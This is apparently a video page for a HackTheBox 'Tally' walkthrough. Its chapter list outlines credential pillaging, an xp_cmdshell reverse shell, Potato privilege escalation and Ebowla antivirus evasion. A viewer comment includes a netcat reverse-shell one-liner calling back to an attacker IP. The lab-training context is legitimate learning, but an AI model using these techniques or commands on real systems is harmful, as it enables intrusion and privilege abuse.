HackTheBox - Tally

39,414 views

IppSec


01:45 - Start of NMAP
04:17 - Begin of SharePoint/GoBuster (Special SharePoint List)
06:32 - Manually browsing to Sitecontent (Get FTP Creds)
10:18 - Mirror FTP + Pillage for information, Find KeePass in Tim's directory and crack it.
18:22 - Mounting/Mirroring ACCT Share with found Creds and finding hardcoded SQL Creds
25:24 - Logging into MSSQL with SQSH, enabling xp_cmdshell and getting a Nishang Rev Shell
34:35 - Finding SPBestWarmUp.ps1 Scheduled Task that runs as Administrator
40:00 - Begin of RottenPotato without MSF (Decoder's Lonely Potato)
45:56 - Using Ebowla Encoding for AV Evasion to create an exe for use with Lonely Potato
58:00 - Lonely Potato Running to return an Admin Shell
BOX DONE
01:04:22 - Finding CVE-2017-0213
01:08:33 - Installing Visual Studio 2015 && Compiling the exploit
01:15:50 - Exploit Compiled, trying to get it to work....
01:18:11 - Just noticed the SPBestWarmUp.ps1 executed and gave us a shell!
01:28:37 - Found the issue, exploit seems to require interactive process
01:30:00 - Begin of Firefox Exploit Cluster (Not recommended to watch lol). It's a second unreliable way to get user

Comments: 67
@exit81dave 6 years ago
I'll need to watch this one several times to note all the awesome things I just learned.
@JohnOmbagi 6 years ago
Wow! You are a great resource, man! This box screwed most of my nights and I couldn't root it. Thanks for your time and knowledge exchange. You are awesome.
@IsAMank 6 years ago
Almost 2 hours, what a treat, and seriously a great box. Glad I got it before it retired!
@theamazingjay161 3 years ago
Good presentation - as usual. Thanks for that.
@mickymaninthehouse 6 years ago
Super interesting to watch!
@mehh5505 6 years ago
And tally is here finally
@ramandeepsingh-vn5fn 6 years ago
AWESOME! Was waiting for this!!!!!
@batcut 5 years ago
Wow Ippsec! This is the first time I've seen a video without dislikes :D
@kali888 5 years ago
6 months later and still only 1 dislike lol
@fsacer 6 years ago
In PowerShell you need to specify .\executable for it to run if executable is not in PATH. Also & operator is sometimes useful. Invoke-WebRequest is new to PowerShell 3. Usually stack is called LIFO (Last In - First Out).
@문석철-x3w 6 years ago
I always love your tutorial. I just hope you would explain exploit code in more detail. Good job and many thanks!
@91dwest 6 years ago
Love your videos! Quick question, how do you know exactly what to look for while going through these boxes?
@alex_94-r2g 6 years ago
I always love windows box priv esc :D
@deathxe5 4 years ago
54:24 sheesh ebowla settle down
@Hitmonkey420 1 year ago
Can't get scheduled task to run, have tried putting iex command as spbest as well as putting the actual tcp oneliner script as spbest, it does not run at the hour. Do you have to enable the task?
@mohdamrirazlan7879 6 years ago
Thanks!
@ozh70 4 years ago
What is the command used in 6:01 to move the cursor up quickly ?
@TalsonHacks 3 years ago
CTRL+B, ‘Page Up’
@hokar4891 4 years ago
Does it matter about the PowerShell you were using and the CVE-2017-0213? You did the [environment] check but was wondering if you would have been able to launch the exploit, if you used SysNative's PowerShell to IEX reverse shell?
@snoopdeckin 6 years ago
Hi ippsec this is the error am getting during ebowla build
root@kali:/opt/Ebowla# ./build_x64_go.sh output/go_symmetric_shell-9004.exe.go ebowla-shell-9004.exe
[*] Copy Files to tmp for building
[*] Building...
./build_x64_go.sh: line 25: go: command not found
[*] Building complete
[*] Copy ebowla-shell-9004.exe to output
cp: cannot stat '/tmp/ebowla-shell-9004.exe': No such file or directory
[*] Cleaning up
rm: cannot remove '/tmp/ebowla-shell-9004.exe': No such file or directory
[*] Done
Later I tried to upload lonelypotatao.exe via meterpreter, loaded incognito, executed binary, but when I list tokens there is no nt authority system under impersonation.. tried several times.. pls suggest
@ippsec 6 years ago
Watch the haircut video and install go:
./build_x64_go.sh: line 25: go: command not found
The above is saying Go is not installed
@bradleytough 4 years ago
Year too late to the party :( When I'm doing lonely potato, my Auth result is 0? Even then, not getting even a standard priv shell call back. Very odd :(
@algoquemole 4 years ago
yeah same... I'm not sure it's applicable now lonelypotato.exe, I found juicypotato.exe and tried it, but windows doesn't recognize it as a valid application
@horizonholt8522 4 years ago
Since 3 months ago (as of today), the author of Lonely Potato (at github.com/decoder-it/lonelypotato) has said to switch to JuicyPotato. I personally used MSFRottenPotato.exe and it worked for me.
@tanuelorez2863 3 years ago
@@horizonholt8522 I tried with MSFRottenPotato.exe too...still got Auth result is 0
@paired7815 5 years ago
thanks ippsec ... I am not able to mount smb share .. It's saying readonly
mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
mount: /mnt/smb: cannot mount //10.10.10.59/ACCT read-only.
@ippsec 5 years ago
I don't know. A quick google says to install smbfs and cifs-utils.
@paired7815 5 years ago
@@ippsec thanks ..it worked !!!
@kaungkhantnyinyi9579 4 years ago
I can't search MSRottenPotato.exe anywhere on google. There's only .cpp file and I don't know how to compile
@MalikAbdullah-je9cp 1 year ago
same issue. Found a fix yet?
@davidkennedy4457 6 years ago
01:06:11 a few times in the videos you have this sound problem, first time on all your videos but on this one that make this 2-3 times ;)
@ippsec 6 years ago
Yeah no idea what happened here. Weird driver glitch I guess or maybe windows vm was trying to take mic
@krisrp0 4 years ago
How are you able to download the ftp mirror so quickly ? My system has been copying these files for the better part of an hour
@paired7815 5 years ago
Why a normal nc is not working here ? MSFRottenPotato.exe * "nc64.exe 10.10.14.XX 9001 -e cmd.exe"
@berndeckenfels 4 years ago
1:17:10 you can always use !ls in ftp client
@emmanuelkacou8099 5 years ago
hi ippsec, if there was no ftp on tally how will you process to upload file from kali to windows using powershell?
@ippsec 5 years ago
Sorry, those types of what if questions would never end so I don't answer them.
@emmanuelkacou8099 5 years ago
@@ippsec excuse me for asking this question.but if you can reply it will help more than one.
@ippsec 5 years ago
@@emmanuelkacou8099 The issue is this question could be applied to every video, and if I said something like well I guess you bruteforce a credential; it's followed up okay bruteforce did not work what next? If the questions take longer for me to answer than it does for the question asker to ask, it's a huge Denial of Service against me.
@emmanuelkacou8099 5 years ago
@@ippsec OK , no problem. i will try harder
@berndeckenfels 4 years ago
You can just use the Powershell web request or use bits to download it with http to the box.
@snoopdeckin 6 years ago
Your version of ebowla does not work, they say to downgrade..took 1 hour to try to fix the problem.. always returns error during build..
@ippsec 6 years ago
I’m guessing you’re missing a dependency. Works fine for me obviously, would help people if you shared what you did. Or the error message you got.
@snoopdeckin 6 years ago
IppSec a guy has already reported an error message on GitHub issue they suggested him to downgrade. I didn't attempt it..as I was confused. But this video is top best video of all series. It's just because of this ebowla I could not move forward.. will see what happens..
@pentestingarabiclanguage6717 6 years ago
hello can you help with a link to learn burp ? from beginner to advance please?:
@ippsec 6 years ago
Watch my videos from first to last. Popcorn may have what you’re looking for. If not then unfortunately I don’t have anything
@davidkennedy4457 6 years ago
and webpwnized is an awesome resource kzbin.info/www/bejne/jKewioeHlNZgbNE
@冰羽-d1o 6 years ago
hello can you tell me how to install this box in kali
@ippsec 6 years ago
HackTheBox Videos are based off of machines on HackTheBox.eu -- Sign up for the site, and you will get a VPN Key to connect to the labs.
@冰羽-d1o 6 years ago
IppSec yes, I have signed up the website, but I see you open /documents/htb/boxes in the video, I don't know what is this
@冰羽-d1o 6 years ago
IppSec do i need to install the box in my kali?how i install it?
@jippiedoe 6 years ago
You don't install anything, he made a folder (/htb/boxes) in his own machine to store anything that has to do with Tally in that folder.
@冰羽-d1o 6 years ago
jippiedoe but how can i open the website (such as 10.10.10.40),can you tell me
@Eric-the-wise 6 years ago
you were in PS when you were not able to run the exe, it has to be .\whatever.exe
@oTarrell13o 5 years ago
How do you hide your TMUX panes like that? Started using tmux after seeing your videos so I know the basics but I feel like knowing that one would be very beneficial when trying to copy into the clipboard. Also the clipboard thing you do is new to me as well. Didn't know you could have multiple items on the clipboard.
@mofogie 3 years ago
it means 'simply me' in spanish lol
@VulcanOnWheels 6 years ago
2:01 Again, shouldn't that be "I've already *run* it"? 4:56 As often as you use gobuster, I'm surprised that it's not in your path. 5:38 I don't see -h on the screen.